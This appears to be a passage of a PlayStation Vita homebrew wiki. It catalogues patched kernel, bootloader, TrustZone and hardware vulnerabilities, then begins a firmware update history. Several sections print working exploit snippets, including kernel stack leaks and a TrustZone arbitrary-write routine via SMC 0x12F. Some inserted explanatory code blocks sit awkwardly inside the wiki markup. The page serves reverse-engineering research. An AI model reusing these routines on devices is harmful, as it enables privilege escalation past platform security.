// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
    socket,<br />
    11,<br />
    flags_,<br />
    mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched in 3.68 or in the FWs just before. These exploits are not usable on retail/testkit because the functions used are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
    uint32_t info[0x12];<br />
<br />
    // 1) Call a function that writes sp to kernel stack<br />
    sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
    // 2) Leak kernel stack<br />
    sceMotionDevGetEvaInfo(info);<br />
<br />
    // 3) Get sysmem base<br />
    uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
    return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 // value specific to 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
    SceInt32 ret = 0;<br />
<br />
    SceNgsRackDescription rackDesc;<br />
    rackDesc.nChannelsPerVoice = 1;<br />
    rackDesc.nVoices = 1;<br />
    rackDesc.nMaxPatchesPerInput = 0;<br />
    rackDesc.nPatchesPerOutput = 1;<br />
<br />
    unsigned int voiceDef[0x400];<br />
    memset(voiceDef, 0x00, 0x400);<br />
    voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
    voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
    voiceDef[2] = 0x40;<br />
    voiceDef[3] = 0x40;<br />
    sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
    sceKernelDelayThread(2*1000*1000);<br />
<br />
    for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
    {<br />
        rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
        ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
        gRet = ret;<br />
        if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
            continue;<br />
        else<br />
            return (addr - DEVCTL_STACK_FRAME);<br />
    }<br />
    return 0xFFFFFFF;<br />
}<br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The two following bugs are exploited by calling memcpy with a negative length, which gives an out-of-bounds (OOB) access without copying an oversized buffer and without triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, adding it to dst yields a value smaller than dst because of an integer overflow. As a consequence, the comparison later in the code evaluates to false, no matter whether it is a signed or an unsigned comparison, and the function believes there are fewer than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. Hence a negative length simply bypasses the copy loop.<br />
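<br />
A constructed C model of the two memcpy defects just described (the wrapped end-pointer check and the signed length compare), followed by a bounded variant that rejects such lengths. This is an added example, not the Vita kernel's memcpy: the 32-byte bulk path and the 64-byte demo buffers are assumptions.<br />
<br />
```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed model of the two memcpy defects; not the Vita kernel's memcpy.
 * The length is an int, as in the bug. Returns how many bytes reached dst. */
size_t model_memcpy(uint8_t *dst, const uint8_t *src, int len)
{
    size_t copied = 0;

    /* Defect 1: the end pointer is computed before len is validated. With a
     * negative len the sum wraps to a value below dst, so the "at least 32
     * bytes to go" test is false and the bulk path is skipped, whether the
     * compiler emits a signed or an unsigned compare. */
    uintptr_t end = (uintptr_t)dst + (uintptr_t)len;
    if (end >= (uintptr_t)dst + 32) {
        size_t blocks = (size_t)len / 32;
        memcpy(dst, src, blocks * 32);          /* assumed 32-byte bulk path */
        copied = blocks * 32;
    }

    /* Defect 2: the remainder loop compares len as a signed int, so a
     * negative len never enters it. Net effect: a negative length is a
     * silent no-op instead of a huge copy or a fault. */
    for (int i = (int)copied; i < len; i++) {
        dst[i] = src[i];
        copied++;
    }
    return copied;
}

/* Bounded variant: the length is unsigned and checked against the real
 * destination size before anything is written. Returns -1 on rejection. */
int bounded_memcpy(uint8_t *dst, size_t dst_size, const uint8_t *src, size_t len)
{
    if (len > dst_size)       /* a negative int cast to size_t lands here too */
        return -1;
    memcpy(dst, src, len);
    return 0;
}

/* Runs model_memcpy on constructed 64-byte buffers and returns the byte count. */
size_t demo_copy(int len)
{
    static uint8_t src[64], dst[64];
    for (int i = 0; i < 64; i++) {
        src[i] = (uint8_t)i;
        dst[i] = 0xAA;
    }
    return model_memcpy(dst, src, len);
}

/* Runs bounded_memcpy on the same kind of constructed buffers. */
int demo_bounded(size_t len)
{
    static uint8_t src[64], dst[64];
    return bounded_memcpy(dst, sizeof dst, src, len);
}

int main(void)
{
    printf("len=-1 copied %zu bytes\n", demo_copy(-1));               /* 0 */
    printf("len=40 copied %zu bytes\n", demo_copy(40));               /* 40 */
    printf("bounded len=(size_t)-1 -> %d\n", demo_bounded((size_t)-1)); /* -1 */
    return 0;
}
```
<br />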
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution, the eMMC MBR can be modified to change the block size. At the time, yifan tried to exploit it through an adjacent malloc (controlled_size), could not find a way, and left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL: a function does not check an error return; if it did, the value corrupted by the buffer overflow would not have been used. Later on, the field that was overwritten is used in a separate call.<br />
<br />
This allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
An imports/exports list for the 1.80 TrustZone modules is available [https://pastebin.com/59pe8jBg here].<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size 0x5000 bytes) and the Secure Kernel sees the exact same region at <code>0x00560000</code>, so data can be planted in the Non-secure Kernel's view of the region and the SMC made to copy it somewhere into TrustZone memory (e.g. the SMC table). This results in TrustZone-level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
#include <stdint.h><br />
#include <string.h><br />
<br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
    /* stage the 8 bytes at offset 0x28 of the Non-secure view of the shared region (0x00560028 on the Secure side) */<br />
    memcpy((void *)0x00400028, src, 8);<br />
<br />
    uintptr_t sm_handle = 0x00560000 >> 1;                 /* handle form is (tz_addr >> 1) */<br />
    uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80; /* slot index relative to the Secure view */<br />
<br />
    asm volatile(<br />
        "mov r0, %0\n\t"<br />
        "mov r1, %1\n\t"<br />
        "mov r12, #0x12F\n\t"<br />
        "smc #0\n\t"<br />
        : : "r"(sm_handle), "r"(shared_mem_index)<br />
        : "r0", "r1", "r12", "memory" /* r0/r1 are written before both inputs are consumed, so they must not hold the inputs */<br />
    );<br />
}<br />
</source><br />
<br />
To achieve code execution, dst must be set to the SMC table address so that two pointers (8 = 2*4 bytes) are planted there.<br />
<br />
Patched somewhere after 1.80 and before 2.10.<br />
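The validation the SMC 0x12F handler omits, as an added illustration that is not Sony's handler nor code from the write-up: the constants are the ones stated above (Secure view of the shared region at 0x00560000, 0x5000 bytes, 0x80-byte slots, handle = tz_addr >> 1); the issued-object table, its placeholder addresses and the function names are assumptions.<br />
<br />
```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>

/* Added illustration of the argument checks SMC 0x12F lacks; hypothetical
 * re-creation, not Sony's code. Constants are those given on the page. */
#define SHARED_MEM_BASE   0x00560000u
#define SHARED_MEM_SIZE   0x5000u
#define SHARED_MEM_SLOT   0x80u
#define SHARED_MEM_SLOTS  (SHARED_MEM_SIZE / SHARED_MEM_SLOT)    /* 0xA0 slots */

/* Constructed stand-in for the secure kernel's bookkeeping of SM objects it
 * has actually handed out; the addresses are placeholders, not real ones. */
static const uintptr_t issued_sm_objects[] = { 0x00510000u, 0x00512000u };

/* Resolve a handle to its TrustZone object address only if that object was issued. */
static bool sm_handle_resolve(uintptr_t sm_handle, uintptr_t *tz_addr_out)
{
    uintptr_t tz_addr = sm_handle << 1;                /* handle is (tz_addr >> 1) */
    for (size_t i = 0; i < sizeof issued_sm_objects / sizeof issued_sm_objects[0]; i++) {
        if (issued_sm_objects[i] == tz_addr) {
            *tz_addr_out = tz_addr;
            return true;
        }
    }
    return false;
}

/* The check the handler should perform before reading 8 bytes at
 * (tz_addr + 0x28) and writing them to (SHARED_MEM_BASE + index * 0x80). */
bool smc_12f_args_valid(uintptr_t sm_handle, uint32_t shared_mem_index)
{
    uintptr_t tz_addr;
    if (!sm_handle_resolve(sm_handle, &tz_addr))
        return false;                 /* unknown object: no arbitrary TZ read */
    if (shared_mem_index >= SHARED_MEM_SLOTS)
        return false;                 /* slot outside the region: no arbitrary TZ write */
    /* SHARED_MEM_SIZE is a multiple of the slot size and 8 < 0x80, so the
     * 8-byte write now always stays inside [SHARED_MEM_BASE, +SHARED_MEM_SIZE). */
    return true;
}

/* Where the write lands once the index has been validated. */
uintptr_t smc_12f_dest(uint32_t shared_mem_index)
{
    return SHARED_MEM_BASE + (uintptr_t)shared_mem_index * SHARED_MEM_SLOT;
}
```

With these two checks in place, the handle used in the example above (<code>0x00560000 >> 1</code>, the shared region itself rather than an issued SM object) is refused, and an index computed from an address outside the 0x5000-byte region never reaches the copy.<br />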
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Boot ROM ===<br />
<br />
(2019-08-30) To be disclosed.<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check the source address and therefore provides an oracle allowing a memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
Not patched yet (not sure).<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code>, the uncached alias of <code>0x800000</code> (both are F00D-only private memory), and later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and the memory is therefore considered safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however, cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to reuse the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as an F00D exception handler table whose entries all point to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it requires almost no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=11475System Software2019-08-30T23:14:51Z<p>Xyz: </p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists has been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
